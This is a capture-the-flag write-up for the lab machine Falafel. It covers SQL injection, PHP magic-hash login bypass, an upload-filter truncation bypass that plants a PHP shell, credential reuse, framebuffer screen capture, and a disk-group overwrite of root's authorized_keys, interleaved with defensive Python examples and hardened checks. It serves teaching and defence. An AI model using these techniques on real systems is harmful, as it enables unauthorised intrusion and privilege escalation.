Falafel write-up
Analysis of Falafel
Enumeration
Port scanning
Let’s scan the full range of TCP ports using my tool htbscan.py (you can find it here: https://github.com/Alamot/code-snippets/blob/master/enum/htbscan.py).
$ sudo htbscan.py 10.10.10.73 200
Running command: sudo masscan -e tun0 -p0-65535 --max-rate 200 --interactive 10.10.10.73
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-06-23 08:46:46 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
rate: 0.20-kpps, 22.83% done, 0:07:18 remaining, found=0
Discovered open port 22/tcp on 10.10.10.73
Discovered open port 80/tcp on 10.10.10.73
Running command: sudo nmap -A -p22,80 10.10.10.73
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-23 11:59 EEST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for falafel.htb (10.10.10.73)
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.8 - 3.11 (94%), Linux 4.4 (94%), Linux 4.8 (94%), Linux 4.9 (94%), Linux 3.18 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Discovering directories and files
If we read http://10.10.10.73/robots.txt we see that all .txt files are disallowed:
User-agent: *
Disallow: /*.txt
Interesting. Let’s brute force them:
$ dirsearch -u http://10.10.10.73 -w /opt/DirBuster/directory-list-2.3-medium.txt -f -e txt
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: txt | Threads: 10 | Wordlist size: 441041
Error Log: /opt/dirsearch/logs/errors-18-06-23_13-05-46.log
Target: http://10.10.10.73
[13:05:52] Starting:
[13:05:58] 403 - 293B - /images/
[13:05:59] 403 - 292B - /icons/
[13:06:02] 403 - 294B - /uploads/
[13:06:06] 403 - 293B - /assets/
[13:06:19] 403 - 290B - /css/
[13:06:36] 403 - 289B - /js/
[13:07:14] 200 - 30B - /robots.txt
[13:11:01] 200 - 804B - /cyberlaw.txt
...
We found this http://10.10.10.73/cyberlaw.txt:
From: Falafel Network Admin (admin@falafel.htb)
Subject: URGENT!! MALICIOUS SITE TAKE OVER!
Date: November 25, 2017 3:30:58 PM PDT
To: lawyers@falafel.htb, devs@falafel.htb
Delivery-Date: Tue, 25 Nov 2017 15:31:01 -0700
Mime-Version: 1.0
X-Spam-Status: score=3.7 tests=DNS_FROM_RFC_POST, HTML_00_10, HTML_MESSAGE, HTML_SHORT_LENGTH version=3.1.7
X-Spam-Level: ***
A user named "chris" has informed me that he could log into MY account without knowing the password,
then take FULL CONTROL of the website using the image upload feature.
We got a cyber protection on the login form, and a senior php developer worked on filtering the URL of the upload,
so I have no idea how he did it.
Dear lawyers, please handle him. I believe Cyberlaw is on our side.
Dear develpors, fix this broken site ASAP.
~admin
SQL Injection
There is an SQL injection on http://10.10.10.73/login.php :
$ sqlmap -u http://10.10.10.73/login.php --dbms=MySQL --method=POST --data="username=x&password=y" --random-agent --risk=3 --level=5 -p username --text-only --string "Wrong identification : admin"
+----+----------+----------------------------------+--------+
| ID | username | password | role |
+----+----------+----------------------------------+--------+
| 1 | admin | 0e462096931906507119562988736854 | admin |
| 2 | chris | d4ee02a22fc872e36d9e3751ba72ddc8 | normal |
+----+----------+----------------------------------+--------+
We can crack chris's hash using hashcat and rockyou.txt:
$ hashcat -m 0 d4ee02a22fc872e36d9e3751ba72ddc8 /usr/share/dict/rockyou.txt
d4ee02a22fc872e36d9e3751ba72ddc8:juggling
You can log in to the website using these credentials (chris:juggling). We have several hints, all about juggling…
(Well, in reality, I never passed through this stage. I went straight for the PHP type juggling. But some guys kept asking me if I had found and/or managed to exploit the sqli. And I was like “What sqli?”… lol).
PHP type juggling and Magic hashes
Read this: https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
Now, have a look at this:
$ echo -n 240610708 | md5sum
0e462097431906509019562988736854 -
$ echo -n QNKCDZO | md5sum
0e830400451993494058024219903391 -
$ echo -n aabg7XSs | md5sum
0e087386482136013740957780965295 -
All those hashes start with 0e followed only by digits. When PHP compares two such strings with ==, it treats both as numeric strings in scientific notation (0 times 10 to some power), converts them to numbers and compares the numbers: every one of them evaluates to zero, so they are all “equal” to each other and to the admin’s stored hash 0e462096931906507119562988736854. Comparison operators should be -by definition- extremely boring, and “magic” operators like == in PHP (and in some other languages) should never have existed in the first place. But PHP just happens to be a bit more magical ;).
Now, just use the credentials admin:240610708 to log in to the website.
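To make the comparison rule concrete, here is an added example (not code from the original write-up) that models PHP's `==` on strings in Python, shows why the three magic hashes above and the admin's stored hash all compare equal, and contrasts the loose check with a strict, constant-time one (the equivalent of PHP's `===`/`hash_equals()`). The `vulnerable_login` function is a hypothetical reconstruction of the site's check, not the actual login.php source.

```python
import hashlib
import hmac
import re

# PHP's definition of a "numeric string": optional whitespace, optional sign,
# digits with an optional fraction, optional exponent.  A string such as
# "0e4620969..." matches it and reads as 0 * 10^462096..., i.e. zero.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def md5_hex(s: str) -> str:
    """Plain MD5 hex digest, the way the site stores its passwords."""
    return hashlib.md5(s.encode()).hexdigest()


def php_loose_equals(a: str, b: str) -> bool:
    """Model of PHP's `==` applied to two strings: if both are numeric strings
    they are compared as numbers, otherwise byte for byte."""
    if _PHP_NUMERIC.match(a) and _PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def is_magic_hash(hexdigest: str) -> bool:
    """A hex digest that is '0e' followed only by decimal digits is a magic
    hash: PHP's == will treat it as the number zero."""
    return re.fullmatch(r"0e[0-9]+", hexdigest) is not None


# Stored hash of the admin user, taken from the dumped users table above.
STORED_ADMIN_HASH = "0e462096931906507119562988736854"


def vulnerable_login(stored_hash: str, candidate: str) -> bool:
    """Hypothetical reconstruction of the broken check: md5($pw) == $stored."""
    return php_loose_equals(stored_hash, md5_hex(candidate))


def hardened_login(stored_hash: str, candidate: str) -> bool:
    """Hardened check: strict, constant-time, no type coercion (what PHP's
    hash_equals() gives you).  MD5 itself still is not a password hash; the
    proper fix also moves to password_hash()/password_verify(), which the
    page does not show."""
    return hmac.compare_digest(stored_hash, md5_hex(candidate))


if __name__ == "__main__":
    for pw in ("240610708", "QNKCDZO", "aabg7XSs"):
        h = md5_hex(pw)
        print(pw, h, "magic" if is_magic_hash(h) else "ordinary",
              "loose:", vulnerable_login(STORED_ADMIN_HASH, pw),
              "strict:", hardened_login(STORED_ADMIN_HASH, pw))
```

Only the admin's hash is magic; chris's hash d4ee02a22fc872e36d9e3751ba72ddc8 is not a numeric string, so loose comparison against it falls back to a normal string compare and the trick does not apply there.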
Getting Shell
The upload form has some extension check. We can bypass it using the double extension technique (.php.png) together with a very long filename: the server validates the name we supply, then shortens it because it is too long, and the shortening cuts off the second extension (.png), leaving a file that ends in .php:
POST /upload.php HTTP/1.1
Host: falafel.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://falafel.htb/upload.php
Cookie: PHPSESSID=goi4pf4aqrm3j3ocf6pogo4tq7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 264
url=http://10.10.15.233/mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm.php.png
The server responds:
<h1>Upload via url:</h1>
<div>
<h3>Upload Succsesful!</h3>
<div>
<h4>Output:</h4>
<pre>CMD: cd /var/www/html/uploads/0204-1952_bf738945a7681df9; wget 'http://10.10.15.233/mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm.php.png'</pre>
<pre>The name is too long, 240 chars total.
Trying to shorten...
New name is mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm.php.
--2018-02-04 19:52:24-- http://10.10.15.233/mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm.php.png
Connecting to 10.10.15.233:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1115 (1.1K) [image/png]
Saving to: 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm.php'
0K . 100% 104M=0s
2018-02-04 19:52:25 (104 MB/s) - 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm.php' saved [1115/1115]
So, just upload your favorite reverse PHP shell and set up your listener.
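The flaw is a check-then-rename ordering problem. As an added example (not the site's upload.php, whose source the page does not show), the following Python models that flow and a hardened alternative. The 236-character cap is an assumption derived from the output above (a 240-character name lost exactly its trailing ".png"); the allowed-extension list and the function names are likewise assumptions.

```python
import secrets
from pathlib import PurePosixPath
from urllib.parse import urlsplit

# Assumed server limit: the 240-character name in the page was shortened by
# exactly the trailing ".png", so a 236-character cap is assumed here.
MAX_NAME = 236
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}


def filename_from_url(url: str) -> str:
    """Last path component of the URL, as the upload handler would derive it."""
    return PurePosixPath(urlsplit(url).path).name


def extension(name: str) -> str:
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def shorten(name: str) -> str:
    """The assumed 'Trying to shorten...' step: cut the name to MAX_NAME chars."""
    return name[:MAX_NAME]


def vulnerable_stored_name(url: str):
    """Hypothetical reconstruction of the flawed flow: validate the extension
    of the name the client supplied, then store under a *different* name."""
    name = filename_from_url(url)
    if extension(name) not in ALLOWED_EXT:
        return None                 # rejected
    return shorten(name)            # may no longer end in the checked extension


def hardened_stored_name(url: str):
    """Refuse over-long names instead of rewriting them, and let the server
    pick the stored name so the client never controls it."""
    name = filename_from_url(url)
    if not name or len(name) > MAX_NAME:
        return None
    ext = extension(name)
    if ext not in ALLOWED_EXT:
        return None
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    long_url = "http://10.10.15.233/" + "m" * 232 + ".php.png"   # 240-char name
    print("vulnerable stores:", "..." + vulnerable_stored_name(long_url)[-8:])
    print("hardened stores:", hardened_stored_name(long_url))
```

The general rule the hardened version follows is to validate the exact name (or better, a server-generated name) that will reach the disk, never an earlier form of it; any transformation applied after validation reopens the check.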
Getting user moshe
Let’s examine connection.php:
$ cat connection.php
<?php
define('DB_SERVER', 'localhost:3306');
define('DB_USERNAME', 'moshe');
define('DB_PASSWORD', 'falafelIsReallyTasty');
define('DB_DATABASE', 'falafel');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
We just found some MySQL credentials, but maybe they are reused for SSH. Let’s check:
$ ssh moshe@10.10.10.73
Password: falafelIsReallyTasty
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)
$
Getting user yossi
Let’s examine which groups we are a member of. (Recommended reading about groups: https://wiki.archlinux.org/index.php/users_and_groups and https://wiki.debian.org/SystemGroups)
$ groups
moshe adm mail news voice floppy audio video games
Now, user moshe is a member of the “video” group. This means that we have access to video capture devices, 2D/3D hardware acceleration and framebuffers. If you don’t know what a framebuffer is, read these: https://en.wikipedia.org/wiki/Linux_framebuffer and https://www.kernel.org/doc/Documentation/fb/framebuffer.txt.
Now, let’s search for files owned by the “video” group:
$ find / -group video 2> /dev/null
/dev/fb0
/dev/dri/card0
/dev/dri/renderD128
/dev/dri/controlD64
...
Interesting… We have access to the framebuffer device /dev/fb0, i.e. to whatever is currently drawn on the console. We can use a tool like https://github.com/AndrewFromMelbourne/fb2png to convert it to a PNG picture, or we can simply dump it:
$ cat /dev/fb0 > fb0.data
Now we can open fb0.data in GIMP as raw image data with a width of 784 pixels (you can find the correct width easily by playing with the slider). The SSH password for yossi is visible in the captured screen image:
$ ssh yossi@10.10.10.73
Password: MoshePlzStopHackingMe!
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)
yossi@falafel:~$
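If you would rather not guess the width in GIMP, the raw dump can be converted to a PNG with a few lines of Python. The following is an added example (not fb2png and not code from the write-up) that assumes the two common fb0 pixel layouts, 32 bpp XRGB8888 (the usual default, stored as B,G,R,X per pixel) and 16 bpp RGB565, and assumes no padding at the end of each scanline; the width is the value found above (784), or whatever /sys/class/graphics/fb0/virtual_size reports on another host.

```python
import struct
import sys
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(tag: bytes, payload: bytes) -> bytes:
    body = tag + payload
    return struct.pack(">I", len(payload)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def fb_to_png(raw: bytes, width: int, bpp: int = 32) -> bytes:
    """Convert a raw framebuffer dump to an 8-bit RGB PNG.

    Assumed layouts: 32 bpp XRGB8888 (little-endian, so each pixel is B,G,R,X)
    or 16 bpp RGB565.  Assumed stride: exactly width * bytes-per-pixel."""
    if bpp not in (16, 32):
        raise ValueError("only 16 (RGB565) and 32 (XRGB8888) bpp are handled")
    bytes_pp = bpp // 8
    stride = width * bytes_pp
    height = len(raw) // stride           # ignore any trailing partial row
    rows = []
    for y in range(height):
        line = raw[y * stride:(y + 1) * stride]
        row = bytearray(b"\x00")          # PNG filter type 0 (None) for this scanline
        for x in range(width):
            px = line[x * bytes_pp:(x + 1) * bytes_pp]
            if bytes_pp == 4:
                r, g, b = px[2], px[1], px[0]
            else:
                v = px[0] | (px[1] << 8)
                r = ((v >> 11) & 0x1F) << 3
                g = ((v >> 5) & 0x3F) << 2
                b = (v & 0x1F) << 3
            row += bytes((r, g, b))
        rows.append(bytes(row))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # 8-bit, colour type 2 (RGB)
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(b"".join(rows)))
            + _chunk(b"IEND", b""))


def png_rgb_rows(png: bytes):
    """Minimal reader for PNGs produced by fb_to_png (single IDAT, filter 0),
    returning the image as rows of (r, g, b) tuples; used to sanity-check the
    conversion."""
    width, height = struct.unpack(">II", png[16:24])
    idat_len = struct.unpack(">I", png[33:37])[0]
    assert png[37:41] == b"IDAT"
    data = zlib.decompress(png[41:41 + idat_len])
    row_len = 1 + 3 * width
    out = []
    for y in range(height):
        line = data[y * row_len + 1:(y + 1) * row_len]
        out.append([tuple(line[i:i + 3]) for i in range(0, len(line), 3)])
    return out


if __name__ == "__main__":
    # usage: python fb_to_png.py fb0.data 784 fb0.png [bpp]
    src, width, dst = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    bpp = int(sys.argv[4]) if len(sys.argv) > 4 else 32
    with open(src, "rb") as f:
        png = fb_to_png(f.read(), width, bpp)
    with open(dst, "wb") as f:
        f.write(png)
```

If the result looks like a sheared image, the width (or the bpp) is wrong; if colours are swapped, the channel order differs from the assumed B,G,R,X. The defensive takeaway is the same either way: membership in video is enough to read the console of whoever is logged in at the physical terminal.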
Getting root
User yossi is a member of those groups:
yossi@falafel:~$ groups
yossi adm disk cdrom dip plugdev lpadmin sambashare
Debian’s wiki says this about the “disk” group:
disk: Raw access to disks. Mostly equivalent to root access.
Security implications
The group disk can be very dangerous, since hard drives in /dev/sd* and /dev/hd* can be read and written bypassing any file system and any partition, allowing a normal user to disclose, alter and destroy both the partitions and the data of such drives without root privileges. Users should never belong to this group.
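Both privilege escalations in this box come from supplementary group membership rather than from a software bug, which makes them easy to audit for. As an added example (not part of the write-up), the following Python reads an /etc/group file and lists every member of a group that grants sensitive access. The sample file is constructed to mirror the memberships found on Falafel (moshe in video, yossi in disk); the list of groups and the one-line reasons are my own, with disk and video taken from the text above.

```python
# Constructed sample of an /etc/group file, modelled on the memberships this
# write-up found (moshe in video, yossi in disk).
SAMPLE_GROUP_FILE = """\
root:x:0:
adm:x:4:syslog,moshe,yossi
disk:x:6:yossi
video:x:44:moshe
shadow:x:42:
sudo:x:27:
docker:x:999:
plugdev:x:46:yossi
"""

# Supplementary groups that hand out root-equivalent or otherwise sensitive
# access; the rationale for disk and video is given in the text above.
SENSITIVE_GROUPS = {
    "disk": "raw read/write access to block devices, bypassing the filesystem",
    "video": "access to /dev/fb* and DRI devices: can capture the screen",
    "shadow": "read access to password hashes",
    "sudo": "may run commands as root",
    "docker": "can start containers that mount the host filesystem",
    "adm": "read access to system logs",
}


def parse_group_file(text: str):
    """Map group name -> set of supplementary members, skipping comments and blank lines."""
    groups = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _pw, _gid, members = line.split(":", 3)
        groups[name] = {m for m in members.split(",") if m}
    return groups


def audit_sensitive_memberships(text: str):
    """Return sorted (user, group, reason) findings for every member of a sensitive group."""
    groups = parse_group_file(text)
    findings = []
    for group, reason in SENSITIVE_GROUPS.items():
        for user in groups.get(group, ()):
            findings.append((user, group, reason))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GROUP_FILE
    for user, group, reason in audit_sensitive_memberships(source):
        print(f"{user:10} {group:8} {reason}")
```

Run it against a real /etc/group (python audit_groups.py /etc/group) on a build image or a fleet host; on this box it would have flagged exactly the two memberships the write-up abused.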
We can use the debugfs command to read any file and the dd command to write anywhere on the disk. Let’s read /root/.ssh/authorized_keys using debugfs:
yossi@falafel:/dev/shm/.a$ debugfs -w /dev/sda1 -R "cat /root/.ssh/authorized_keys"
debugfs 1.42.13 (17-May-2015)
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDI92VC7JWv8vjFeINUryVOfzyTjNUQR+JFVDUBbFA84djurSFv5l3pY9VzM5tScL5NoSWkNeF/eCMu+Ne+fuoa5l6Q10HVqha3kgpP3TLP29TH+B+/bb5vxd0J3PJeklbR8CYQ36bkMARPEcPM901+mzDBikNfSCosJki4wLtnwPxamSAFZDlF+l0UNa8h7FEN/CP8PH62Ig8Zxi2SlD9SKFoOAXSDCP3XZlzU3n7Swgtf9B1RD5nLA/+qPUUj6SL+Qlxixb/kllwbbTFLRCA29QEamv4waHa6uHhqeAtyq7lv9lV2agdo7H9Q6s3LCSnjzr9JC2ffQSvtKUzb3/w9 root@falafel
Let’s find the block where the “/root/.ssh/authorized_keys” file resides:
yossi@falafel:/dev/shm/.a$ debugfs /dev/sda1 -R "blocks /root/.ssh/authorized_keys"
debugfs 1.42.13 (17-May-2015)
1608806
Let’s use dd to write our own public key over the data block of /root/.ssh/authorized_keys. With bs=4096 (the filesystem block size) and seek=1608806, dd lands exactly on the block debugfs reported, and it writes over (i.e. replaces) the old data:
yossi@falafel:/dev/shm/.a$ dd if=/dev/shm/.a/my_id_rsa.pub of=/dev/sda1 seek=1608806 bs=4096 count=1
0+1 records in
0+1 records out
394 bytes copied, 0.00239741 s, 164 kB/s
Don’t forget to sync afterwards:
yossi@falafel:/dev/shm/.a$ sync
Now, let’s see if we succeeded:
yossi@falafel:/dev/shm/.a$ debugfs -w /dev/sda1 -R "cat /root/.ssh/authorized_keys"
debugfs 1.42.13 (17-May-2015)
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkqoxni226ZUH21u4/gq/W+kjRVasgG9Fm+gZCcKr2RAHLyADWz5GdFdGOCvb0+nTMxfH50l+Hf5Hq/dFeysjse1N5i9fJOW9hmzjQ9Gj26TJg94UL3TbzeBqK7SRbvKj4z1wPwYWyDeZ3qo1mH1U0Sg4iwkqpW/WR3VdeXAyUqxJ27BJfYTEgb0H1RSubqxIAu7RWOGw/nwek61No7FRfBrlXhWhEOvUlYOX+0n9n1ofFeDkiswyH27bMjGJbvsFv2erNE2oGWzguhUhZmd3ALf7z6Vq0WyASar2Y7f3uLBe7x4HvvSPyOJd4hEqYJopqe1KACzE7LoTqk6roKT0v alamot@TCOM1
Hooray! :D
ssh -i ~/.ssh/id_rsa root@10.10.10.73
root@falafel:~#
Exploiting glibc for privilege escalation
The exploit https://www.exploit-db.com/exploits/43775/ (“glibc - ‘getcwd()’ Local Privilege Escalation”, a.k.a. “RationalLove”) used to work on Falafel. Note that I had to compile it with GCC version 6.3.0 to make it work. But anyway, the box has since been patched and, as far as I know, it doesn’t work anymore at all.